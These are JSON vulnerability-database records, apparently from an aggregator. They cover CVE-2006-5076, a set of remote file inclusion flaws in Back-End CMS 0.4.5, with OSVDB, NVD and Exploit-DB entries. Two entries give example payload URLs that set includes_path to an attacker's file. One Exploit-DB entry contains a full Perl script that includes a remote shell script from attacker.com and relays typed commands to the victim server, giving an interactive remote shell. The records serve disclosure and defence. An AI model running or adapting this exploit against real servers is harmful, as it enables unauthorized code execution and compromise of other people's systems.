{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32309](https://vulners.com/osvdb/OSVDB:32309)\n[Related OSVDB ID: 32310](https://vulners.com/osvdb/OSVDB:32310)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0246.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0475.html\n[CVE-2006-5076](https://vulners.com/cve/CVE-2006-5076)\nBugtraq ID: 20207\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "fb6caa49e0e820eed55fd82468a73e01"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "2f6d6224baf470471dfa680556066bee"}, {"key": "href", "hash": "dd32e12d674bc86f1ed631f42aa33f92"}, {"key": "modified", "hash": "a008e7e124b19c13900cebfdde9d1ef8"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a008e7e124b19c13900cebfdde9d1ef8"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "d8b0de945fd4ddf799ac8858789ea0b6"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:32311", "modified": "2006-09-25T20:05:57", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "id": "OSVDB:32311", "title": "Back-End search.php includes_path Variable Remote File Inclusion", "hash": "9154a4ec2f9918df7f6de15c8d3459532b0b465b0d900e10cb22ed279e66f08f", "edition": 1, "published": "2006-09-25T20:05:57", "type": "osvdb", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-5076"], "lastseen": "2017-04-28T13:20:28"}

{"cve": [{"lastseen": "2018-10-18T15:05:37", "references": ["http://www.securityfocus.com/archive/1/450031/100/200/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29172", "http://www.securityfocus.com/archive/1/447005/100/0/threaded", "http://www.securityfocus.com/archive/1/448776/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29605", "http://www.securityfocus.com/bid/20207", "http://securityreason.com/securityalert/1650"], "description": "Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End 0.4.5 allow remote attackers to execute arbitrary PHP code via a URL in the includes_path parameter in (1) admin/index.php, (2) Facts.php, or (3) search.php.", "edition": 3, "reporter": "NVD", "published": "2006-09-28T20:07:00", "title": "CVE-2006-5076", "type": "cve", "enchantments": {"score": {"modified": "2018-10-18T15:05:37", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-5076"], "scanner": [], "modified": "2018-10-17T17:41:00", "cpe": ["cpe:/a:back-end:back-end_cms:0.4.5"], "id": "CVE-2006-5076", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5076", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T08:41:08", "osvdbidlist": ["32311"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Back-End CMS 0.4.5 search.php includes_path Parameter Remote File Inclusion. CVE-2006-5076 . Webapps exploit for php platform", "reporter": "Root3r_H3ll", "published": "2006-09-25T00:00:00", "type": "exploitdb", "title": "Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5076"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2006-09-25T00:00:00", "id": "EDB-ID:28676", "href": "https://www.exploit-db.com/exploits/28676/", "sourceData": "source: http://www.securityfocus.com/bid/20207/info\r\n \r\nBack-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nA successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n \r\nBack-End CMS version 0.4.5 is vulnerable to these issues.\r\n\r\nhttp://www.example.com/[Path]/search.php?includes_path=attacker's_file", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28676/"}, {"lastseen": "2016-02-03T08:40:51", "osvdbidlist": ["32309"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion. CVE-2006-5076. Webapps exploit for php platform", "reporter": "Root3r_H3ll", "published": "2006-09-25T00:00:00", "type": "exploitdb", "title": "Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5076"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2006-09-25T00:00:00", "id": "EDB-ID:28674", "href": "https://www.exploit-db.com/exploits/28674/", "sourceData": "source: http://www.securityfocus.com/bid/20207/info\r\n\r\nBack-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.\r\n\r\nA successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n\r\nBack-End CMS version 0.4.5 is vulnerable to these issues.\r\n\r\n#!/usr/bin/perl\r\n\r\n#################################################################\r\n# #\r\n# Back-end #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Discovered By : Root3r_H3LL = |)\\0073|)\\_|-|311 #\r\n# #\r\n# Original Advisory : http://Www.PersainFox.coM #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n# #\r\n#################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"#################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# Back-end => 0.4.5 Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : PerSianFox Security #\\n\";\r\nprint \"# Email: Root3r_H3LL Root3r_ir[at]yahoo.com #\\n\";\r\nprint \"# Web Site : Www.PerSianFox.coM #\\n\";\r\nprint \"# We ArE :Root3r_H3LL,Arashrj #\\n\";\r\nprint \"# #\\n\";\r\nprint \"# #\\n\";\r\nprint \"# </\\/\\\\/_ 10\\/3 15 1|)\\4/\\/ #\\n\";\r\nprint \"# #\\n\";\r\nprint \"#################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Root3r.pl [host] [path] \";\r\n print \"\\n EX : Root3r.pl www.victim.com /[path]/ \\n\\n\";\r\nexit;\r\n}\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.\"/admin/index.php?includes_path=\".$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28674/"}, {"lastseen": "2016-02-03T08:41:00", "osvdbidlist": ["32310"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion. CVE-2006-5076. Webapps exploit for php platform", "reporter": "Root3r_H3ll", "published": "2006-09-25T00:00:00", "type": "exploitdb", "title": "Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5076"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2006-09-25T00:00:00", "id": "EDB-ID:28675", "href": "https://www.exploit-db.com/exploits/28675/", "sourceData": "source: http://www.securityfocus.com/bid/20207/info\r\n \r\nBack-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nA successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n \r\nBack-End CMS version 0.4.5 is vulnerable to these issues.\r\n\r\nhttp://www.example.com/[Path]/Facts.php?includes_path=attacker's_file", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28675/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "references": [], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32309](https://vulners.com/osvdb/OSVDB:32309)\n[Related OSVDB ID: 32311](https://vulners.com/osvdb/OSVDB:32311)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0246.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0475.html\n[CVE-2006-5076](https://vulners.com/cve/CVE-2006-5076)\nBugtraq ID: 20207\n", "edition": 1, "reporter": "OSVDB", "published": "2006-09-25T20:05:57", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Back-End Facts.php includes_path Variable Remote File Inclusion", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5076"], "modified": "2006-09-25T20:05:57", "href": "https://vulners.com/osvdb/OSVDB:32310", "id": "OSVDB:32310", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "references": [], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32311](https://vulners.com/osvdb/OSVDB:32311)\n[Related OSVDB ID: 32310](https://vulners.com/osvdb/OSVDB:32310)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0246.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0475.html\n[CVE-2006-5076](https://vulners.com/cve/CVE-2006-5076)\nBugtraq ID: 20207\n", "edition": 1, "reporter": "OSVDB", "published": "2006-09-25T20:05:57", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Back-End admin/index.php includes_path Variable Remote File Inclusion", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5076"], "modified": "2006-09-25T20:05:57", "href": "https://vulners.com/osvdb/OSVDB:32309", "id": "OSVDB:32309", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}